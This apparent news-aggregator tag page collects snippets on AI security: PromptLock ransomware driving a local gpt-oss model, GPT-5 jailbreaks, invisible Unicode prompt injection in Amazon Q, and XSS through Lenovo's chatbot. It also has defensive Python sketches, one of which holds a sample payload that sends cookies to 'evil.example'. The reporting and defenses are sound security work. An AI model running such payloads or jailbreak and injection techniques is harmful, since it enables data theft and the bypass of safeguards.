Tag: openai
-
AI as a cybercrime copilot
Tags: ai, business, ciso, cyberattack, cybercrime, dns, group, injection, intelligence, malware, openai, ransomware, RedTeam, sans, strategy, threat, tool
The AI-powered developer tool Claude Code helped a cybercriminal break into networks. CISOs and security decision-makers have long expected that cyberattacks would eventually come not from humans using AI tools but from AI systems themselves. New research findings have now confirmed that fear: Anthropic's latest Threat Intelligence Report reveals that the AI-powered developer tool Claude…
-
OpenAI is testing “Thinking effort” for ChatGPT
OpenAI is working on a new feature called the Thinking effort picker for ChatGPT. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-is-testing-thinking-effort-for-chatgpt/
-
AI attacks autonomously for the first time
Tags: ai, business, ciso, cyberattack, cybercrime, dns, group, injection, intelligence, malware, openai, ransomware, RedTeam, sans, strategy, threat, tool
The AI-powered developer tool Claude Code helped a cybercriminal break into networks. CISOs and security decision-makers have long expected that cyberattacks would eventually come not from humans using AI tools but from AI systems themselves. New research findings have now confirmed that fear: Anthropic's latest Threat Intelligence Report reveals that the AI-powered developer tool Claude…
-
OpenAI, Anthropic Swap Safety Reviews
AI Giants Evaluated Each Other’s Newer Models for Safety Risks. OpenAI and Anthropic evaluated each other’s AI models in the summer, testing for concerning behaviors that could indicate misalignment risks. Both companies released their findings simultaneously: no model was severely problematic, but all showed plenty of troubling behavior in testing scenarios. First seen on govinfosecurity.com…
-
First AI-Powered Ransomware “PromptLock” Uses OpenAI gpt-oss-20b for Encryption
PromptLock, a novel ransomware strain discovered by the ESET Research team, marks the first known instance of malware harnessing a local large language model to generate its malicious payload on the victim’s machine. Rather than carrying pre-compiled attack logic, PromptLock ships with hard-coded prompts that instruct a locally hosted OpenAI gpt-oss:20b model, accessed via the…
-
Someone Created the First AI-Powered Ransomware Using OpenAI’s gpt-oss:20b Model
Cybersecurity company ESET has disclosed that it discovered an artificial intelligence (AI)-powered ransomware variant codenamed PromptLock. Written in Golang, the newly identified strain uses the gpt-oss:20b model from OpenAI locally via the Ollama API to generate malicious Lua scripts in real-time. The open-weight language model was released by OpenAI earlier this month. First seen on thehackernews.com…
-
Anthropic detects the inevitable: genAI-only attacks, no humans involved
Tags: ai, attack, business, ciso, control, cybercrime, cybersecurity, defense, dns, infrastructure, injection, intelligence, malicious, malware, open-source, openai, RedTeam, threat, tool, warfare
…not find. “There is potentially a lot of this activity we’re not seeing. Anthropic being open about their platform being used for malicious activities is significant, and OpenAI has recently shared the same as well. But will others open up about what is already likely happening?” Brunkard asked. “Or maybe they haven’t shared because they don’t…
-
First AI-Powered Ransomware PromptLock Targets Windows, Linux and macOS
ESET has identified PromptLock, the first AI-powered ransomware, using OpenAI models to generate scripts that target Windows, Linux… First seen on hackread.com Jump to article: hackread.com/first-ai-promptlock-ransomware-windows-linux-macos/
-
Examining Elon Musk’s xAI Lawsuit against OpenAI, Apple
While the lawsuit alleges anticompetitive practices and market monopolization, the case highlights the complexities of proving such claims. First seen on techtarget.com Jump to article: www.techtarget.com/searchenterpriseai/news/366629910/Examining-Elon-Musks-xAI-Lawsuit-against-OpenAI-Apple
-
AI-Powered Ransomware Has Arrived With ‘PromptLock’
Researchers raise the alarm that a new, rapidly evolving ransomware strain uses an OpenAI model to render and execute malicious code in real time, ushering in a new era of cyberattacks against enterprises. First seen on darkreading.com Jump to article: www.darkreading.com/vulnerabilities-threats/ai-powered-ransomware-promptlock
-
ESET warns of PromptLock, the first AI-driven ransomware
ESET found PromptLock, the first AI-driven ransomware, using OpenAI’s gpt-oss:20b via Ollama to generate and run malicious Lua scripts. In a series of messages published on X, ESET Research announced the discovery of the first known AI-powered ransomware, named PromptLock. The PromptLock malware uses the gpt-oss:20b model from OpenAI locally via the Ollama API to…
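Several of the PromptLock items above describe the same mechanism: hard-coded prompts sent to a locally hosted gpt-oss:20b model through Ollama's HTTP API, with the generated text then executed. A minimal, benign sketch of what such an API call looks like, assuming Ollama's default local endpoint (the helper name and prompt are ours, for illustration only):

```python
import json

OLLAMA_URL = "http://localhost:11434/api/generate"  # Ollama's default local endpoint

def build_generate_request(model: str, prompt: str) -> bytes:
    """Build the JSON body that Ollama's /api/generate endpoint expects."""
    return json.dumps({"model": model, "prompt": prompt, "stream": False}).encode()

# A harmless request; PromptLock reportedly asks for Lua scripts this way.
body = build_generate_request("gpt-oss:20b", "Write a Lua function that prints 'hello'.")
# POSTing `body` to OLLAMA_URL with Content-Type: application/json returns a
# JSON object whose "response" field carries the generated text.
```

The defensive takeaway is that such malware produces no outbound traffic to an AI vendor: the model runs entirely on the victim's machine, so detection has to focus on the local Ollama process and on dynamically generated scripts rather than on network indicators.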
-
First AI-powered ransomware spotted, but it’s not active yet
Oh, look, a use case for OpenAI’s gpt-oss-20b model. First seen on theregister.com Jump to article: www.theregister.com/2025/08/26/first_aipowered_ransomware_spotted_by/
-
Hackers can slip ghost commands into the Amazon Q Developer VS Code Extension
The model creator won’t fix the flaw: The issue is apparently inherited from Anthropic’s Claude, which powers Amazon Q, and Anthropic will, reportedly, not fix it. “Anthropic models are known to interpret invisible Unicode Tag characters as instructions,” the author said. “This is not something that Anthropic intends to fix, to my knowledge, see this…
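The flaw described above rests on Unicode's "Tags" block (U+E0000–U+E007F), whose characters mirror ASCII but render invisibly, letting an attacker smuggle instructions the user never sees. A defensive sketch that detects and strips these characters before text reaches a model (the function names are ours):

```python
TAG_RANGE = range(0xE0000, 0xE0080)  # Unicode "Tags" block: invisible when rendered

def has_hidden_payload(text: str) -> bool:
    """True if the text contains any invisible Unicode Tag characters."""
    return any(ord(ch) in TAG_RANGE for ch in text)

def strip_tag_characters(text: str) -> str:
    """Remove Tag characters so hidden instructions never reach the model."""
    return "".join(ch for ch in text if ord(ch) not in TAG_RANGE)

# A string that *looks* like "open file" but carries a hidden "delete" payload
# (each ASCII char shifted into the Tags block by adding 0xE0000):
hidden = "open file" + "".join(chr(0xE0000 + ord(c)) for c in "delete")
assert has_hidden_payload(hidden)
assert strip_tag_characters(hidden) == "open file"
```

Sanitizing at the boundary this way is model-agnostic, which matters when, as here, the model vendor declines to change the model's behavior.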
-
Lenovo chatbot flaw spotlights AI security risks
Researchers managed to inject malicious code through a vulnerability in Lenovo's customer-support chatbot. Lenovo's chatbot "Lena" is based on OpenAI's GPT-4 and is used for customer support. Security researchers at Cybernews found that the AI tool was vulnerable to cross-site scripting (XSS) attacks. The experts discovered a flaw that let them generate malicious HTML content…
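The article doesn't detail Lena's rendering stack, but the generic mitigation for this class of chatbot XSS is the same everywhere: treat model output as untrusted text and escape it before embedding it in a page. A minimal sketch using Python's standard library (the function name is ours):

```python
import html

def render_bot_reply(reply: str) -> str:
    """Escape model output before embedding it in a support-chat page,
    so injected markup renders as inert text instead of executing."""
    return html.escape(reply, quote=True)

# An LLM tricked into emitting an exfiltration payload:
malicious = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
safe = render_bot_reply(malicious)
assert "<img" not in safe          # no live tag survives
assert safe.startswith("&lt;img")  # it is displayed, not executed
```

Output escaping is necessary because, unlike classic XSS, the "attacker-controlled input" here can be the model itself once a prompt injection succeeds.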
-
AI crawlers and fetchers are blowing up websites, with Meta and OpenAI the worst offenders
One fetcher bot seen smacking a website with 39,000 requests per minute First seen on theregister.com Jump to article: www.theregister.com/2025/08/21/ai_crawler_traffic/
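Sites facing this traffic commonly filter the self-identifying crawlers by user agent. A sketch of such a check; the listed bot tokens are examples of commonly reported AI crawler/fetcher user agents (GPTBot, ClaudeBot, etc.), not a list taken from the article, and real deployments keep it updated:

```python
# Example tokens only; production lists need regular maintenance.
AI_BOT_SUBSTRINGS = (
    "GPTBot", "OAI-SearchBot", "ChatGPT-User",  # OpenAI crawlers/fetchers
    "meta-externalagent",                        # Meta's crawler
    "ClaudeBot",                                 # Anthropic's crawler
)

def is_ai_bot(user_agent: str) -> bool:
    """Case-insensitive substring match against known AI bot user agents."""
    ua = (user_agent or "").lower()
    return any(token.lower() in ua for token in AI_BOT_SUBSTRINGS)

assert is_ai_bot("Mozilla/5.0 AppleWebKit/537.36; compatible; GPTBot/1.2")
assert not is_ai_bot("Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/128.0")
```

User-agent filtering only stops bots that identify themselves honestly; rate limiting per source remains the backstop for the rest.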
-
Microsoft’s Patch Tuesday: 100+ Updates Including Azure OpenAI Service, Memory Corruption Flaw
Microsoft patched CVE-2025-50165, an “extremely high-risk” memory corruption flaw in its graphics component that could let attackers execute code over the network. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-microsoft-patch-tuesday-august-25/
-
OpenAI says GPT-6 is coming and it’ll be better than GPT-5 (obviously)
OpenAI’s CEO Sam Altman told reporters that GPT-6 is already in the works, and it won’t take as long to arrive as GPT-5 did. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-says-gpt-6-is-coming-and-itll-be-better-than-gpt-5-obviously/
-
OpenAI releases $4 ChatGPT plan, but it’s not available in the US for now
OpenAI has announced the ChatGPT Go subscription, which costs the equivalent of $4 (INR 399 in India), though it is not yet available in the US. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-releases-4-chatgpt-plan-but-its-not-available-in-the-us-for-now/
-
The AI Memory Wars: Why One System Crushed the Competition (And It’s Not OpenAI)
Most AI agents forget everything almost immediately. I benchmarked OpenAI Memory, LangMem, MemGPT, and Mem0 in real production environments. One system delivered 26% better accuracy and 91% faster performance. Here’s which memory solution actually works for long-term AI agent deployments. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/08/the-ai-memory-wars-why-one-system-crushed-the-competition-and-its-not-openai/
-
Inside the Jailbreak Methods Beating GPT-5 Safety Guardrails
Experts Say AI Model Makers Are Prioritizing Profit Over Security. Hackers don’t need the deep pockets of a nation-state to break GPT-5, OpenAI’s new flagship model. Analysis from artificial intelligence security researchers finds a few well-placed hyphens are enough to trick the large language model into breaking safeguards against adversarial prompts. First seen on govinfosecurity.com…
-
OpenAI releases warmer GPT-5 personality, but only for non-thinking model
Tags: openai
OpenAI has confirmed it has begun rolling out a new, warmer personality for GPT-5, though it won’t be as warm as GPT-4o, which is still available under legacy models. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/artificial-intelligence/openai-releases-warmer-gpt-5-personality-but-only-for-non-thinking-model/
-
Agentic AI promises a cybersecurity revolution, with asterisks
Tags: ai, api, authentication, ceo, ciso, cloud, control, cybersecurity, data, endpoint, infrastructure, jobs, LLM, open-source, openai, risk, service, soc, software, supply-chain, technology, tool, update, vulnerability
Trust, transparency, and moving slowly are crucial: Like all technologies, and perhaps more dramatically than most, agentic AI carries both risks and benefits. One obvious risk of AI agents is that, like most LLMs, they will hallucinate or make errors that could cause problems. “If you want to remove or give agency to a platform…
-
Guess what else GPT-5 is bad at? Security
OpenAI and Microsoft have said that GPT-5 is one of their safest and most secure models out of the box yet. An AI red-teamer called its performance “terrible.” First seen on cyberscoop.com Jump to article: cyberscoop.com/gpt5-openai-microsoft-security-review/
-
GPT-5 jailbroken hours after launch using ‘Echo Chamber’ and Storytelling exploit
Grok and Gemini also fell to Echo Chamber: the Echo Chamber jailbreak was first disclosed by Neural Trust in June, when researchers reported the technique’s ability to trick leading GPT and Gemini models. The technique, shown to exploit the models’ tendency to trust consistency across conversations and ‘echo’ the same malicious idea through multiple conversations, had…
-
How vulnerable AI agents are
AI agents are useful but dangerous, as recent findings from security researchers demonstrate. Large language models (LLMs) are being connected to ever more tools and data sources. That brings benefits, but it also enlarges the attack surface and creates new prompt-injection opportunities for cybercriminals. Prompt injection is not a new attack technique, but with agentic AI it reaches an entirely new level, as demonstrated by research specialists at the…

